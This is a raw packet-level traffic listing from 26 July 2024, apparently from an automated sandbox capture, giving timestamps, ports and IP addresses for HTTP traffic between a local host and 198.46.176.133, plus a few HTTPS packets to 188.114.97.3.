Jul 26, 2024 13:02:47.145931959 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.145951033 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.145979881 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.146011114 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.146044016 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.146063089 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.146092892 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.146123886 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.146156073 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.146173954 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.149075031 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.149369001 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.149401903 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.149427891 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.149473906 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.149506092 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.149539948 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.149559021 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.149590015 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.149740934 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.149988890 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.150021076 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.150053978 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.150087118 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.150109053 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.150139093 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.150170088 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.150223970 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.150789976 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.150824070 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.150856018 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.150887966 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.150907040 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.150935888 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.150969028 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.151015997 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.152643919 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.152676105 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.152709961 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.152733088 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.152990103 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.153017998 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.153074980 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.153774023 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.153822899 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.153856993 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.153887987 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.153909922 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.153942108 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.157437086 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.162405968 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.167557001 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.167591095 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.167625904 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.167645931 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.167774916 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.167805910 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.167826891 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.167856932 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.167898893 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.167912006 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.168309927 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.168340921 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.168359041 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.168390036 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.168421030 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.168462038 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.168474913 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.168540955 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.168593884 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.168984890 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.169167042 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.169199944 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.169230938 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.169262886 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.169281960 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.169312000 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.169344902 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.169375896 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.169393063 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.170049906 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.170083046 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.170101881 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.170133114 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.170164108 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.170182943 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.170212984 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.170244932 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.170277119 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.170298100 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.170880079 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.170912027 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.170943975 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.170962095 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.170991898 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.171022892 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.171042919 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.171072960 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.171726942 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.171758890 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.171777964 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.171807051 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.171838045 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.171857119 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.171886921 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.171919107 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.171936989 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.171967030 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.172775984 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.172808886 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.172827959 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.172857046 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.172888041 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.172907114 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.172935963 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.172967911 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.172998905 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.173017025 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.173540115 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.173573017 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.173590899 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.173620939 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.173651934 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.173682928 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.173705101 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.173734903 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.174299002 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.174330950 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.174350023 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.174380064 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.174411058 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.174442053 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.174463034 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.174494028 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.174541950 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.174592972 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.175012112 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175044060 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175076008 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175108910 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175131083 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.175160885 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175194025 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175225973 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175245047 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.175276995 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175307035 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175327063 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.175895929 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175928116 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175960064 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.175978899 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.176007986 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176039934 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176070929 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176089048 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.176119089 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176150084 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176181078 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176198959 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.176230907 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176829100 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176860094 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176879883 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.176909924 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176940918 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176973104 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.176991940 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.177021980 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.177052975 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.177084923 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.177103043 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.177129984 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.177742004 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.177808046 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.177839994 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.177871943 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.177891016 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.177922010 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.177953005 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.177983999 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178004980 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.178030014 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178061008 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178092003 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178112984 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.178143024 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178658962 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178690910 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178710938 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.178740025 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178772926 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178803921 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178826094 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.178855896 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178886890 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178919077 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178940058 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.178963900 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.178994894 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.179013968 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.179548979 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.179580927 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.179611921 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.179630995 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.179661036 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.179692030 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.179725885 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.179747105 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.179776907 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.179807901 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.179826021 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.179857016 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.180443048 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.180474997 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.180504084 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.180531025 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.180562973 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.180594921 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.180613995 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.180643082 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.180675030 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.180706978 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.180728912 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.187959909 CEST	443	49179	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:47.188047886 CEST	49179	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:47.203267097 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.208626032 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.208676100 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.208708048 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.208755016 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.208951950 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.208983898 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.209024906 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.209038019 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.209069014 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.209625006 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.209656954 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.209676981 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.209707975 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.209739923 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.209780931 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.209794044 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.209824085 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.209866047 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.209877968 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.210148096 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.210278034 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.210310936 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.210331917 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.210357904 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.210388899 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.210407019 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.210437059 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.210468054 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.210506916 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.210520029 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.210551023 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.210828066 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.211078882 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.211110115 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.211142063 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.211182117 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.211194992 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.211224079 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.211256027 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.211296082 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.211308956 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.211338043 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.211369991 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.211407900 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.211765051 CEST	49179	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:47.211782932 CEST	443	49179	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:47.212033987 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.212065935 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.212080002 CEST	443	49179	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:47.212105036 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.212131023 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.212162971 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.212193966 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.212234020 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.212246895 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.212275028 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.212306976 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.212346077 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.212359905 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.212979078 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.213011980 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.213042974 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.213063002 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.213093996 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.213124037 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.213165045 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.213177919 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.213207960 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.213238955 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.213279009 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.213290930 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.213926077 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.213958025 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.213996887 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.214010000 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.214040995 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.214071035 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.214112043 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.214123964 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.214154005 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.214185953 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.214225054 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.214237928 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.214855909 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.214888096 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.214926958 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.214941025 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.214970112 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215001106 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215039968 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215054035 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.215082884 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215114117 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215152979 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215166092 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.215466976 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.215706110 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215754986 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215786934 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215806007 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.215836048 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215874910 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215888023 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:47.215918064 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215956926 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:47.215970039 CEST	49177	80	192.168.2.22	198.46.176.133
